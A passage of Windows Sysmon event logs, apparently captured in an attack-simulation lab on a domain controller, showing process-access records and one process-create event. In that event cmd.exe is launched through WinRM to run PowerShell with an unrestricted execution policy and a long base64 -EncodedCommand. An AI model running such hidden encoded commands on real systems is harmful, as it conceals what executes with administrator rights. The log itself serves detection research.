\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"3916","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4953,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.455\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001098DB0600}\r\nProcessId: 1348\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nParentProcessId: 2464\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.455","ProcessGuid":"{E2A3D6B1-11C4-5F25-0000-001098DB0600}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","ParentProcessId":"2464","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4954,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-0010C3D80600}\r\nSourceProcessId: 2464\r\nSourceThreadId: 4540\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001098DB0600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-0010C3D80600}","SourceProcessId":"2464","SourceThreadId":"4540","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001098DB0600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4955,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001098DB0600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001098DB0600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4956,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4957,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4958,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 